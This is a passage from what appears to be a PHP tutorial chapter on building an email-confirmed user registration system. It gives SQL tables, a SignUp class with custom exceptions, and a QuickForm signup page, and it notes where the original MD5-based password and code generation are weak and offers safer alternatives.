of their email addresses—if they try to register again with that address, you can
deny them access. Be warned, though: a new type of Internet service is becoming
popular. Pioneered by Mailinator, these services provide users with temporary email
addresses that they can use for registrations. This, of course, means email is not a
foolproof screening mechanism, but it is still a worthwhile addition to a registration
system.

Solution
Here, we’ll put together a registration system that validates new registrants using
their email addresses, and in turn, sends them an email that asks them to confirm
their registration via a URL.

A registration system is yet another great opportunity to build more classes! This
time, though, it will be even more interesting, as we use the PEAR::HTML_QuickForm9
package and PEAR::Mail_Mime10 to do some of the work for the registration system.

9 http://pear.php.net/package/HTML_QuickForm/
10 http://pear.php.net/package/Mail_Mime/

      The rest will be handled by classes we’ll build, but the end result will be easy for
      you to customize and reuse in your own applications.

      First of all, we need to understand the process of signing up a new user:

      ■	 The user fills in the registration form.

      ■	 Upon the user’s completion of the form, the registration system inserts a record
         into the signup table and sends a confirmation email.

      ■	 The visitor follows the link in the email and confirms the account.

      ■	 We copy the details from the signup table to the user table. The account is now
         active.

      We use two tables for handling signups: this way, we can separate the “dangerous”
      or unverified user data from the “safe” or confirmed user data. You’ll need a cron
      job or similar scheduled task to check the signup table on a regular basis and delete
      any entries that are older than, say, 24 hours. Our separation of the tables makes it
      easier to purge the contents of the signup table (and avoid unfortunate errors), and
      keep the user table trim so that there’s no unnecessary impact on performance
      during user authentication.
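The scheduled clean-up could be as small as the following sketch. It assumes a signup table whose created column holds a Unix timestamp, as in the SQL for this solution; the purgeStaleSignups function is hypothetical, and the table and column names are hard-coded for brevity. The code assumes PHP 7.1 or later:

```php
<?php
// Deletes signup rows older than $maxAge seconds and returns the
// number of rows removed. $now can be supplied to make testing easier.
function purgeStaleSignups(PDO $db, int $maxAge = 86400, ?int $now = null): int
{
    $cutoff = ($now ?? time()) - $maxAge;

    $stmt = $db->prepare('DELETE FROM signup WHERE created < :cutoff');
    $stmt->bindValue(':cutoff', $cutoff, PDO::PARAM_INT);
    $stmt->execute();

    return $stmt->rowCount();
}
```

A small command-line script that connects with the credentials in dbcred.php and calls purgeStaleSignups($dbh) could then be run from cron once an hour.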

      Our solution uses a specific database structure. Here’s the SQL for the signup table:

                                                                 access_control.sql (excerpt)

       CREATE TABLE signup (
         signup_id    INT(11)     NOT NULL AUTO_INCREMENT,
         login        VARCHAR(50) NOT NULL DEFAULT '',
         password     VARCHAR(50) NOT NULL DEFAULT '',
         email        VARCHAR(50) DEFAULT NULL,
         firstName    VARCHAR(50) DEFAULT NULL,
         lastName     VARCHAR(50) DEFAULT NULL,
         signature    TEXT        NOT NULL,
         confirm_code VARCHAR(40) NOT NULL DEFAULT '',
         created      INT(11)     NOT NULL DEFAULT '0',
         PRIMARY KEY (signup_id),
         UNIQUE KEY confirm_code (confirm_code),
         UNIQUE KEY user_login (login),
         UNIQUE KEY email (email)
       );

Here’s the SQL for the user table:

                                                              access_control.sql (excerpt)

 CREATE TABLE user (
   user_id     INT(11)      NOT NULL AUTO_INCREMENT,
   login       VARCHAR(50) NOT NULL DEFAULT '',
   password    VARCHAR(50) NOT NULL DEFAULT '',
   email       VARCHAR(50) DEFAULT NULL,
   firstName   VARCHAR(50) DEFAULT NULL,
   lastName    VARCHAR(50) DEFAULT NULL,
   signature   TEXT         NOT NULL,
   PRIMARY KEY (user_id),
   UNIQUE KEY user_login (login)
 );



The SignUp Class
The first part of our solution is the SignUp class, which provides all the functionality
for signing up new users, and uses the following configuration settings:

                                                              access_control.ini (excerpt)

 ; Access Control Settings

 ;user login table details
 [users_table]
 table=user
 col_id=user_id
 col_login=login
 col_password=password
 col_email=email
 col_name_first=firstName
 col_name_last=lastName
 col_signature=signature

 ;signup login table details
 [signup_table]
 table=signup
 col_id=signup_id
 col_login=login
 col_password=password
 col_email=email
 col_name_first=firstName
 col_name_last=lastName
 col_signature=signature
 col_code=confirm_code
 col_created=created



      The first group of settings represents the details of the user table in our database:
      the name of the table and the names of its columns. The second group represents the
      table and column names of the signup table.
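To see how these settings look once PHP has read them, here's a small sketch that parses a shortened copy of the file with parse_ini_string. The shortened content is inlined only so that the example runs on its own:

```php
<?php
// A shortened copy of the settings, inlined for the example.
$ini = <<<INI
[users_table]
table=user
col_login=login

[signup_table]
table=signup
col_code=confirm_code
INI;

// Passing true as the second argument keeps the [section] grouping,
// giving a two-level array indexed by section name, then setting name.
$cfg = parse_ini_string($ini, true);

echo $cfg['users_table']['table'], "\n";       // prints "user"
echo $cfg['signup_table']['col_code'], "\n";   // prints "confirm_code"
```

This two-level array is why a lookup for a setting names the section first and the setting second.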

      Let’s define some custom exception classes so that we can provide a consistent level
      of error handling:

                                                                    Signup.class.php (excerpt)

       class SignUpException extends Exception
       {
         public function __construct($message = null, $code = 0)
         {
           parent::__construct($message, $code);
           error_log('Error in '.$this->getFile().
             ' Line: '.$this->getLine().
             ' Error: '.$this->getMessage()
           );
         }
       }
       class SignUpDatabaseException extends SignUpException {}
       class SignUpNotUniqueException extends SignUpException {}
       class SignUpEmailException extends SignUpException {}
       class SignUpConfirmationException extends SignUpException {}



      Our base class, SignUpException, is a custom exception that ensures the exception
      details are logged using the error_log function. The subclasses represent different
      exception situations that might arise during the signup process. This method of error
      handling implementation ensures that all exceptions are logged consistently, and
      allows any script that uses our SignUp class to implement custom logic to handle
      the various types of exceptions. We’ll see how such logic can be implemented in
      our script very soon.
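As a quick illustration of why the subclasses are useful, here's a minimal sketch of catch blocks ordered from most specific to most general. The classes are reduced stand-ins for the ones above (the logging is omitted so that the example runs on its own), and the attempt function is hypothetical:

```php
<?php
// Reduced stand-ins for the exception classes, without the logging.
class SignUpException extends Exception {}
class SignUpNotUniqueException extends SignUpException {}
class SignUpEmailException extends SignUpException {}

// Hypothetical helper: runs one step of the signup process and reports
// which kind of problem, if any, occurred.
function attempt(callable $step): string
{
    try {
        $step();
        return 'ok';
    } catch (SignUpNotUniqueException $e) {
        return 'duplicate';   // ask for a different username or email
    } catch (SignUpEmailException $e) {
        return 'email';       // the confirmation email couldn't be sent
    } catch (SignUpException $e) {
        return 'error';       // any other signup problem
    }
}
```

The base class is caught last; if it came first, it would also match the subclasses and the more specific blocks would never run.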

      We begin our SignUp class definition with the class properties:

                                                            Signup.class.php (excerpt)

 class SignUp
 {
   protected $db;
   protected $cfg;
   protected $from;
   protected $to;
   protected $subject;
   protected $message;
   protected $html;
   protected $listener;
   protected $confirmCode;



$db will contain a PDO instance for our database connection, $cfg will store our
configuration details, $from will contain the name and address used in the confirmation
email’s From field, $to will contain the name and address the email is sent
to, $subject will contain the subject of the email, $message will represent the body
of the email, and $html will contain a true or false value to indicate whether or
not the email is an HTML email. The $listener property will contain the URL listed
as the email confirmation link and $confirmCode will contain the unique code
needed to confirm this particular user’s registration.

The $to and $confirmCode properties are set and used internally by the class, while
the rest of the properties are initialized by the class constructor:

                                                            Signup.class.php (excerpt)

   public function __construct(PDO $db, $listener, $frmName,
                   $frmAddress, $subj, $msg, $html)
   {
     $this->db             = $db;
     $this->cfg            = parse_ini_file('access_control.ini',
         TRUE);
     $this->listener       = $listener;
     $this->from[$frmName] = $frmAddress;
     $this->subject        = $subj;
     $this->message        = $msg;
     $this->html           = $html;
   }

      When we instantiate the class, we need to pass the constructor a PDO
      object instance containing the connection to the database, the URL to which registrants
      should be directed when they confirm their signups, a sender name and From
      address for use in the signup email (for example Your Name <you@yoursite.com>),
      and the subject and message for the email itself. Finally, we need to identify
      whether or not this is an HTML email, so that PEAR::Mail_Mime can format the
      message correctly.

      Whether it contains HTML or not, the message should contain at least one special
      tag: <confirm_url/>. This acts as a placeholder in the message, identifying the
      location in the email body at which the confirmation URL, built by the SignUp class,
      should be inserted.

      The createCode method is called internally within the class, and is used to generate
      the confirmation code that will be sent via email:

                                                                  Signup.class.php (excerpt)

         private function createCode($login)
         {
           srand((double)microtime() * 1000000);
           $this->confirmCode = md5($login . time() . rand(1, 1000000));
         }
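
The code above builds its value from the login name, the current time, and a pseudo-random number, all of which an attacker could in principle narrow down. If you're running PHP 7 or later, a sketch like the following draws the code from the operating system's secure random source instead. The createConfirmCode function is hypothetical and isn't part of the SignUp class:

```php
<?php
// Hypothetical alternative to createCode: 20 random bytes rendered as
// 40 hexadecimal characters, which fits a VARCHAR(40) column such as
// confirm_code.
function createConfirmCode(): string
{
    return bin2hex(random_bytes(20));
}
```

Inside the class, the method would assign this value to the $confirmCode property rather than return it.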



      When the registration form is submitted, the createSignup method creates a record
      of the registration request. The createSignup method takes the information the user
      submits via the registration form, checks the database to ensure that the username
      and email address do not already exist in the user table, and inserts a new record
      into the signup table. Let’s take a look at how this method works:

                                                                  Signup.class.php (excerpt)

         public function createSignup($userDetails)
         {
           $user_table = $this->cfg['users_table']['table'];
           $user_login = $this->cfg['users_table']['col_login'];
           $user_pass = $this->cfg['users_table']['col_password'];
           $user_email = $this->cfg['users_table']['col_email'];
           $user_first = $this->cfg['users_table']['col_name_first'];
           $user_last = $this->cfg['users_table']['col_name_last'];
           $user_sig = $this->cfg['users_table']['col_signature'];

           $sign_table = $this->cfg['signup_table']['table'];
           $sign_login = $this->cfg['signup_table']['col_login'];
           $sign_pass = $this->cfg['signup_table']['col_password'];
           $sign_email = $this->cfg['signup_table']['col_email'];
           $sign_first = $this->cfg['signup_table']['col_name_first'];
           $sign_last = $this->cfg['signup_table']['col_name_last'];
           $sign_sig = $this->cfg['signup_table']['col_signature'];
           $sign_code = $this->cfg['signup_table']['col_code'];
           $sign_created = $this->cfg['signup_table']['col_created'];

           try
           {
             $sql = "SELECT COUNT(*) AS num_row FROM " . $user_table . "
                 WHERE
                 " . $user_login . "=:login OR
                 " . $user_email . "=:email";
             $stmt = $this->db->prepare($sql);
             $stmt->bindParam(':login', $userDetails[$user_login]);
             $stmt->bindParam(':email', $userDetails[$user_email]);
             $stmt->execute();
             $result = $stmt->fetch(PDO::FETCH_ASSOC);
           }
           catch (PDOException $e)
           {
             throw new SignUpDatabaseException('Database error when' .
                 ' checking user is unique: '.$e->getMessage());
           }




First, we assign all the needed configuration settings to local variables to improve
the readability of our script. The first action the method performs is to complete a
database query: it counts the number of rows in the user table where the submitted
username matches the value in the login column in the database, or where the
submitted email address is a match to the value in the email column. We wrap this
action within a try {…} catch (PDOException $e) {…} block in case a
PDOException is thrown. When we catch the PDOException, we throw one of the
custom exceptions we wrote for this class—a SignUpDatabaseException.

The next step for the createSignup method is to check the results of the query and,
if it’s okay to proceed, to prepare the data for insertion into the signup table:

                                                                  Signup.class.php (excerpt)

            if ($result['num_row'] > 0)
            {
              throw new SignUpNotUniqueException(
                  'username or email address not unique');
            }

            $this->createCode($userDetails[$user_login]);
            $toName = $userDetails[$user_first] . ' ' .
                $userDetails[$user_last];
            $this->to[$toName] = $userDetails[$user_email];



      If the count is greater than 0, we already have a user
      with that username or email address, and it’s not okay to proceed with the signup.
      Our reaction is to throw another one of our custom exceptions, this time a
      SignUpNotUniqueException, to indicate that the signup details are not unique.
      Otherwise, we call createCode to generate the confirmation code, and store the
      registrant’s name and email address in the $to property for the confirmation email.

      The final step in the createSignup method is to insert the new registration into the
      signup table:

                                                                  Signup.class.php (excerpt)

            try
            {
              $sql = "INSERT INTO " . $sign_table .
                  "(". $sign_login . ", " . $sign_pass .
                  ", " . $sign_email . ", " . $sign_first .
                  ", " . $sign_last . ", " . $sign_sig .
                  ", " . $sign_code . ", " . $sign_created . ") ".
                  "VALUES (:login, :password,
                  :email, :firstname, :lastname,
                  :signature, :confirm, :time)";
              $stmt = $this->db->prepare($sql);
              $stmt->bindParam(':login', $userDetails[$user_login]);
              $stmt->bindParam(':password', $userDetails[$user_pass]);
              $stmt->bindParam(':email', $userDetails[$user_email]);
              $stmt->bindParam(':firstname', $userDetails[$user_first]);
              $stmt->bindParam(':lastname', $userDetails[$user_last]);
              $stmt->bindParam(':signature', $userDetails[$user_sig]);
              $stmt->bindParam(':confirm', $this->confirmCode);
              // bindParam needs a variable, so bind the timestamp by value
              $stmt->bindValue(':time', time(), PDO::PARAM_INT);
              $stmt->execute();
            }
            catch (PDOException $e)
            {
              throw new SignUpDatabaseException('Database error when' .
                  ' inserting into signup: '.$e->getMessage());
            }
          }




All the data in the $userDetails variable—the details submitted via the registration
form—are inserted into the signup table. If a PDOException is thrown, we throw a
new instance of our SignUpDatabaseException class.

The sendConfirmation method is used to send a confirmation email to the person
who’s just signed up:

                                                            Signup.class.php (excerpt)

   public function sendConfirmation()
   {
     // Pear Mail_Mime included in the calling script
     $fromName = key($this->from);
     $hdrs = array(
         'From'     => $this->from[$fromName],
         'Subject' => $this->subject
     );
     $crlf = "\n";

      if ($this->html)
      {
        $replace = '<a href="' . $this->listener . '?code=' .
            $this->confirmCode . '">' . $this->listener .
            '?code=' . $this->confirmCode . '</a>';
      }
      else
      {
        $replace = $this->listener . '?code=' . $this->confirmCode;
      }
      $this->message = str_replace('<confirm_url/>',
          $replace,
          $this->message
      );

      $mime = new Mail_mime($crlf);
      $mime->setHTMLBody($this->message);
      $mime->setTXTBody(strip_tags($this->message));
      $body = $mime->get();
      $hdrs = $mime->headers($hdrs);
      $mail = Mail::factory('mail');
      $succ = $mail->send($this->to, $hdrs, $body);
      if (PEAR::isError($succ))
      {
        throw new SignUpEmailException('Error sending confirmation' .
            ' email: ' .$succ->getDebugInfo());
      }
   }




      The sendConfirmation method generates the content of the confirmation email,
      in HTML or text, by replacing the special text <confirm_url/> with the confirmation
      URL the user will need to click on to confirm the registration. The confirmation
      URL is generated using the $listener property, set by the class constructor method,
      and the unique code that the createCode method stored in the $confirmCode
      property. sendConfirmation then uses an instance of the PEAR::Mail_mime class to
      build the email and PEAR::Mail to send it. If an error is generated with the
      sending of the email, another one of our custom exceptions,
      SignUpEmailException, will be thrown. We’ll also use the getDebugInfo
      method of the PEAR_Error object to obtain some information about the error.
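To make the placeholder substitution concrete, here's a standalone sketch of that one step. The insertConfirmUrl function, the example.com address, and the abc123 code are all hypothetical; unlike the method above, this version also escapes the URL before placing it in HTML. The code assumes PHP 7 or later:

```php
<?php
// Hypothetical standalone version of the placeholder substitution.
function insertConfirmUrl(
    string $message,
    string $listener,
    string $code,
    bool $html
): string {
    $url = $listener . '?code=' . rawurlencode($code);

    if ($html) {
        // Escape the URL before using it as an attribute and as link text
        $safe    = htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
        $replace = '<a href="' . $safe . '">' . $safe . '</a>';
    } else {
        $replace = $url;
    }

    return str_replace('<confirm_url/>', $replace, $message);
}

echo insertConfirmUrl(
    'Please confirm your account: <confirm_url/>',
    'http://www.example.com/signup.php',
    'abc123',
    false
), "\n";
```

For the plain-text call shown, the placeholder is replaced with http://www.example.com/signup.php?code=abc123.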

      Finally, the confirm method is used to examine confirmations via the URL sent in
      the email:

                                                                 Signup.class.php (excerpt)

         public function confirm($confirmCode)
         {
           $user_table = $this->cfg['users_table']['table'];
           $user_login = $this->cfg['users_table']['col_login'];
           $user_pass = $this->cfg['users_table']['col_password'];
           $user_email = $this->cfg['users_table']['col_email'];
           $user_first = $this->cfg['users_table']['col_name_first'];
           $user_last = $this->cfg['users_table']['col_name_last'];
           $user_sig = $this->cfg['users_table']['col_signature'];

            $sign_table = $this->cfg['signup_table']['table'];
            $sign_id = $this->cfg['signup_table']['col_id'];
            $sign_login = $this->cfg['signup_table']['col_login'];
            $sign_pass = $this->cfg['signup_table']['col_password'];
            $sign_email = $this->cfg['signup_table']['col_email'];
            $sign_first = $this->cfg['signup_table']['col_name_first'];
            $sign_last = $this->cfg['signup_table']['col_name_last'];
            $sign_sig = $this->cfg['signup_table']['col_signature'];
            $sign_code = $this->cfg['signup_table']['col_code'];

            try
            {
              $sql = "SELECT * FROM " . $sign_table . "
                  WHERE " . $sign_code . "=:confirmCode";
              $stmt = $this->db->prepare($sql);
              $stmt->bindParam(':confirmCode', $confirmCode);
              $stmt->execute();
              $row = $stmt->fetchAll();
            }
            catch (PDOException $e)
            {
              throw new SignUpDatabaseException('Database error when' .
                  ' looking up confirmation code: '.$e->getMessage());
            }




Again, we assign configuration settings to local variables to improve the script’s
readability. First, the confirm method selects from the signup table all records that
have a value in the confirm_code column that matches the $confirmCode value.

If the number of records returned is anything other than 1, a problem has occurred
and a SignUpConfirmationException exception is thrown:

                                                            Signup.class.php (excerpt)

      if (count($row) != 1) {
          throw new SignUpConfirmationException(count($row) .
              ' records found for confirmation code: ' .
              $confirmCode
          );
      }



If exactly one matching record is found, the method can continue to process the
confirmation:

                                                                  Signup.class.php (excerpt)

               try
               {
                 // Copy the data from Signup to User table
                 $sql = "INSERT INTO " . $user_table . " (
                     " . $user_login . ", " . $user_pass . ",
                     " . $user_email . ", " . $user_first . ",
                     " . $user_last . ", " . $user_sig . ") VALUES (
                     :login, :pass, :email, :firstname, :lastname, :sign )";
                 $stmt = $this->db->prepare($sql);
                 $stmt->bindParam(':login',$row[0][$sign_login]);
                 $stmt->bindParam(':pass',$row[0][$sign_pass]);
                 $stmt->bindParam(':email',$row[0][$sign_email]);
                 $stmt->bindParam(':firstname',$row[0][$sign_first]);
                 $stmt->bindParam(':lastname',$row[0][$sign_last]);
                 $stmt->bindParam(':sign',$row[0][$sign_sig]);
                 $stmt->execute();
                 // Delete row from signup table
                 $sql = "DELETE FROM " . $sign_table . "
                     WHERE " . $sign_id . "= :id";
                 $stmt = $this->db->prepare($sql);
                 $stmt->bindParam(':id', $row[0][$sign_id]);
                 $stmt->execute();
               }
               catch (PDOException $e)
               {
                 throw new SignUpDatabaseException('Database error when' .
                     ' inserting user info: '.$e->getMessage());
               }
           }
       }



      If an account is successfully confirmed, the record is copied to the user table, and
      the old record is deleted from the signup table.
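
The copy and the delete run as two separate statements, so a failure between them could leave the record in both tables. One way to guard against that is to wrap both statements in a PDO transaction. The following is a minimal sketch, assuming a storage engine that supports transactions (for MySQL, InnoDB rather than MyISAM). The moveSignupToUser function, the reduced two-column tables, and the in-memory SQLite database are assumptions made for illustration; they are not part of the SignUp class.

```php
<?php
// Hypothetical helper: moves one confirmed row from a signup table to a
// user table atomically. Table and column names are illustrative only.
function moveSignupToUser(PDO $db, $signupId)
{
    $db->beginTransaction();
    try {
        $copy = $db->prepare(
            'INSERT INTO user (login, email)
             SELECT login, email FROM signup WHERE signup_id = :id'
        );
        $copy->execute(array(':id' => $signupId));

        $delete = $db->prepare('DELETE FROM signup WHERE signup_id = :id');
        $delete->execute(array(':id' => $signupId));

        $db->commit();
    } catch (PDOException $e) {
        // Undo the INSERT if the DELETE (or anything else) failed
        $db->rollBack();
        throw $e;
    }
}

// Demonstration against an in-memory SQLite database (assumes pdo_sqlite)
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE signup (signup_id INTEGER PRIMARY KEY, login TEXT, email TEXT)');
$db->exec('CREATE TABLE user (user_id INTEGER PRIMARY KEY, login TEXT, email TEXT)');
$db->exec("INSERT INTO signup (login, email) VALUES ('harryf', 'harry@example.com')");

moveSignupToUser($db, 1);
$usersAfter = (int) $db->query('SELECT COUNT(*) FROM user')->fetchColumn();
$signupsAfter = (int) $db->query('SELECT COUNT(*) FROM signup')->fetchColumn();
```

If either statement throws, the rollback leaves the signup row in place, so the user can simply follow the confirmation link again.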

      Thus the confirmation process, the user’s registration, and our SignUp class are
      complete!

      The Signup Page
      Now that our SignUp class is done, we need a web page from which to display the
      registration form and run the process.

The first step is to include the classes we’ll use:

                                                                signup.php (excerpt)

 <?php
 error_reporting(E_ALL);
 require_once 'SignUp.class.php';
 require_once 'HTML/QuickForm.php';
 require_once 'Mail.php';
 require_once 'Mail/mime.php';
 require 'dbcred.php';



Because the PEAR packages we’re using raise E_STRICT errors under PHP 5, we set the
error reporting level to E_ALL with the error_reporting function; in PHP versions
before 5.4, E_ALL does not include E_STRICT.

Of course, we need to include our SignUp class file. We’ll also be using the PEAR
HTML_QuickForm, Mail, and Mail_mime packages. The dbcred.php file contains the
database credentials we’ll need to connect to our database.

Next, we create the variables we need:

                                                                signup.php (excerpt)

 $reg_messages = array(
     'success' => array(
         'title' => 'Confirmation Successful',
         'content' => '<p>Thank you. Your account has now been' .
         ' confirmed.<br />You can now <a href="access.php">login' .
         '</a></p>'
     ),
     'confirm_error' => array(
         'title' => 'Confirmation Problem',
         'content' => '<p>There was a problem confirming your' .
         ' account.<br />Please try again or contact the site ' .
         'administrators</p>'
     ),
     'email_sent' => array(
         'title' => 'Check your email',
         'content' => '<p>Thank you. Please check your email to ' .
         'confirm your account</p>'
     ),
     'email_error' => array(
         'title' => 'Email Problem',
         'content' => '<p>Unable to send confirmation email.<br />' .
         'Please contact the site administrators.</p>'
     ),
     'signup_not_unique' => array(
         'title' => 'Registration Problem',
         'content' => '<p>There was an error creating your' .
         ' account.<br />The desired username or email address has' .
         ' already been taken.</p>'
     ),
     'signup_error' => array(
         'title' => 'Registration Problem',
         'content' => '<p>There was an error creating your' .
         ' account.<br />Please contact the site administrators.' .
         '</p>'
     )
 );
 $listener = 'http://localhost/phpant2/chapter_10/examples/' .
     'signup.php';
 $frmName = 'Your Name';
 $frmAddress = 'noreply@yoursite.com';
 $subj = 'Account Confirmation';
 $msg = <<<EOD
 <html>
 <body>
 <h2>Thank you for registering!</h2>
 <div>The final step is to confirm
 your account by clicking on:</div>
 <div><confirm_url/></div>
 <div>
 <b>Your Site Team</b>
 </div>
 </body>
 </html>
 EOD;




      The $reg_messages variable contains an array of page titles and messages that will
      be used in the web page, depending on the stage and status of the registration process.
      $listener, $frmName, $frmAddress, $subj, and $msg are required by our SignUp
      class. If you have a look at the $msg variable, the body of our confirmation email,
      you’ll see the special <confirm_url/> code which will be replaced by the
      confirmation URL later in the process.
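
The placeholder substitution can be sketched with str_replace. This is only an illustration of the idea: the buildConfirmationBody function is a hypothetical name, and the way the SignUp class actually builds the link may differ. The code query parameter matches the $_GET['code'] check used by the signup page.

```php
<?php
// Hypothetical helper, not part of the SignUp class shown in the text
function buildConfirmationBody($template, $listener, $confirmCode)
{
    // rawurlencode keeps the code safe inside a query string
    $url = $listener . '?code=' . rawurlencode($confirmCode);
    // Escape the URL before placing it in HTML attributes and text
    $link = '<a href="' . htmlspecialchars($url) . '">' .
        htmlspecialchars($url) . '</a>';
    return str_replace('<confirm_url/>', $link, $template);
}

$template = '<div>Confirm here: <confirm_url/></div>';
$body = buildConfirmationBody($template,
    'http://localhost/signup.php', 'abc123');
```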

The $listener variable stores the absolute URL of the script to which the
confirmation code should be submitted. It links to itself in our example script. This variable
is set to reflect the folder setup of our testing environment, so make sure you change
this variable to suit your own setup.

The next step is to set up our database connection and instantiate our SignUp object:

                                                                   signup.php (excerpt)

 try
 {
   // Instantiate the PDO object for the database connection
   $db = new PDO($dsn, $user, $password);
   $db->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);

   // Instantiate the signup class
   $signUp = new SignUp($db, $listener, $frmName,
       $frmAddress, $subj, $msg, TRUE);



Notice also that we’re opening a try block to catch any exceptions that may be
thrown from the execution of the rest of the code. Any exceptions caught after this
point—if the PDO connection fails for example—will display an appropriate message
on the web page, instead of showing a PHP error.

The next step is to check whether the page is being requested as part of a
confirmation; we’ll check for the presence of the $_GET['code'] variable:

                                                                   signup.php (excerpt)

   if (isset($_GET['code']))
   {
     try
     {
       $signUp->confirm($_GET['code']);
       $display = $reg_messages['success'];
     } catch (SignUpException $e){
       $display = $reg_messages['confirm_error'];
     }
   }

      If the confirmation code is present, we call the SignUp->confirm method, supplying
      the code the page received. We then set the $display variable, which will contain
      the page title and message to display on our web page. If no exception was raised
      from the confirm method at this point in the script, we can assume all went well
      and set the $display variable to the success message. If, however, a
      SignUpException exception was thrown, we set the $display variable to the
      confirm_error message. You may remember that the SignUpException class was
      the base class for all our custom exceptions. By catching this class of exception,
      we’ll catch an instance of any of our custom exceptions.

      If the confirmation code is not present, we prepare to display the registration form:

                                                                       signup.php (excerpt)

         else
         {
           function cmpPass($element, $confirmPass)
           {
             $password = $GLOBALS['form']->getElementValue('password');
             return $password == $confirmPass;
           }
           function encryptValue($value)
           {
             return md5($value);
           }



      The above are helper functions that will be used by our HTML_QuickForm object to
      validate and filter the registration form contents.
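
The encryptValue helper relies on md5, which is fast to compute and unsalted, and is therefore a weak choice for storing passwords today. On PHP 5.5 or later, the built-in password_hash function is a sturdier option. The sketch below is an assumption-laden alternative, not the book’s method: hashPassword is a hypothetical name, the password column would need to be wider than VARCHAR(50) (the PHP manual suggests 255 characters), and the login code would have to call password_verify instead of comparing MD5 strings.

```php
<?php
// Hypothetical replacement for the encryptValue filter (requires PHP 5.5+)
function hashPassword($value)
{
    // PASSWORD_DEFAULT picks the current default algorithm and
    // generates a random salt automatically
    return password_hash($value, PASSWORD_DEFAULT);
}

$stored = hashPassword('s3cret99');

// At login, check the submitted password with password_verify
// rather than hashing it again and comparing strings
$matches = password_verify('s3cret99', $stored);
$rejects = password_verify('wrong', $stored);
```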

      The HTML_QuickForm object makes it very easy to construct the form and the form
      validation:

                                                                       signup.php (excerpt)

            /* Make the form */
            // Instantiate the QuickForm class
            $form = new HTML_QuickForm('regForm', 'POST');

            // Register the compare function
            $form->registerRule('compare', 'function', 'cmpPass');

            // The login field
            $form->addElement('text', 'login', 'Desired Username');
            $form->addRule('login', 'Please provide a username',
                'required', FALSE, 'client');
            $form->addRule('login',
                'Username must be at least 6 characters',
                'minlength', 6, 'client');
            $form->addRule('login',
                'Username cannot be more than 50 characters', 'maxlength',
                50, 'client');
            $form->addRule('login',
                'Username can only contain letters and numbers',
                'alphanumeric', NULL, 'client');

            // The password field
            $form->addElement('password', 'password', 'Password');
            $form->addRule('password', 'Please provide a password',
                'required', FALSE, 'client');
            $form->addRule('password',
                'Password must be at least 6 characters', 'minlength', 6,
                'client');
            $form->addRule('password',
                'Password cannot be more than 12 characters', 'maxlength',
                12, 'client');
            $form->addRule('password',
                'Password can only contain letters and numbers',
                'alphanumeric', NULL, 'client');

            // The field for confirming the password
            $form->addElement('password', 'confirmPass',
                'Confirm Password');
            $form->addRule('confirmPass', 'Please confirm password',
                'required', FALSE, 'client');
            $form->addRule('confirmPass', 'Passwords must match',
                'compare', 'function');

            // The email field
            $form->addElement('text', 'email', 'Email Address');
            $form->addRule('email', 'Please enter an email address',
                'required', FALSE, 'client');
            $form->addRule('email', 'Please enter a valid email address',
                'email', FALSE, 'client');
            $form->addRule('email',
                'Email cannot be more than 50 characters',
                'maxlength', 50, 'client');

            // The first name field
            $form->addElement('text', 'firstName', 'First Name');
            $form->addRule('firstName', 'Please enter your first name',
                'required', FALSE, 'client');
            $form->addRule('firstName',
                'First name cannot be more than 50 characters', 'maxlength',
                50, 'client');

            // The last name field
            $form->addElement('text', 'lastName', 'Last Name');
            $form->addRule('lastName', 'Please enter your last name',
                'required', FALSE, 'client');
            $form->addRule('lastName',
                'Last name cannot be more than 50 characters', 'maxlength',
                50, 'client');

            // The signature field
            $form->addElement('textarea', 'signature', 'Signature');

            // Add a submit button called submit,
            // with "Register" as the button text
            $form->addElement('submit', 'submit', 'Register');
            /* End making the form */




      After we’ve defined the registration form, we use the HTML_QuickForm->validate
      method to check that the form has been submitted and that it validates. If it does
      validate, we can proceed to build the array of form data our SignUp object needs to
      create a new signup record:

                                                                      signup.php (excerpt)

            if ($form->validate())
            {
              // Apply the encryption filter to the password
              $form->applyFilter('password', 'encryptValue');

              // Build an array from the submitted form values
              $submitVars = array(
                  'login' => $form->getSubmitValue('login'),
                  'password' => $form->getSubmitValue('password'),
                  'email' => $form->getSubmitValue('email'),
                  'firstName' => $form->getSubmitValue('firstName'),
                  'lastName' => $form->getSubmitValue('lastName'),
                  'signature' => $form->getSubmitValue('signature')
              );




Since we’re using HTML_QuickForm, any slashes added by magic quotes are
automatically removed from the submitted values; when you’re not using HTML_QuickForm,
be sure to strip out the slashes if magic_quotes_gpc is enabled.
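
For scripts that don’t use the form package, the slash stripping could look something like the following sketch. The stripSlashesDeep function is a hypothetical helper introduced here for illustration. The function_exists guard is included because get_magic_quotes_gpc was removed in PHP 8, where magic quotes no longer exist at all.

```php
<?php
// Hypothetical helper: recursively removes slashes from a value or array
function stripSlashesDeep($value)
{
    return is_array($value)
        ? array_map('stripSlashesDeep', $value)
        : stripslashes($value);
}

// Only strip when magic quotes actually added the slashes
if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
    $_POST = stripSlashesDeep($_POST);
}

// Demonstration on a value as magic quotes would have delivered it
$clean = stripSlashesDeep(array('lastName' => 'O\\\'Reilly'));
```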

Next, we create the signup record and send the confirmation email. We
want to wrap this in a try block in order to catch any possible exceptions:

                                                                  signup.php (excerpt)

          try
          {
            $signUp->createSignup($submitVars);
            $signUp->sendConfirmation();
            $display = $reg_messages['email_sent'];
          }
          catch (SignUpEmailException $e)
          {
            $display = $reg_messages['email_error'];
          }
          catch (SignUpNotUniqueException $e)
          {
            $display = $reg_messages['signup_not_unique'];
          }
          catch (SignUpException $e)
          {
            $display = $reg_messages['signup_error'];
          }
      }



If no exceptions are thrown, we can set $display to an appropriate message that
informs the user to expect the email. If exceptions are thrown, we can set $display
to a message that’s appropriate for each one, thanks to our defining of several custom
exception classes.
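
The order of the catch blocks matters: PHP runs the first block whose class matches, so the subclasses have to be listed before the base class. The sketch below demonstrates this with simplified stand-ins for the chapter’s exception classes (the real ones also log their details). The messageKeyFor function is a hypothetical helper used only to make the behavior easy to check.

```php
<?php
// Simplified stand-ins for the custom exception classes in this chapter
class SignUpException extends Exception {}
class SignUpEmailException extends SignUpException {}
class SignUpNotUniqueException extends SignUpException {}

// Hypothetical helper that maps a thrown exception to a message key
function messageKeyFor(Exception $thrown)
{
    try {
        throw $thrown;
    } catch (SignUpEmailException $e) {
        return 'email_error';
    } catch (SignUpNotUniqueException $e) {
        return 'signup_not_unique';
    } catch (SignUpException $e) {
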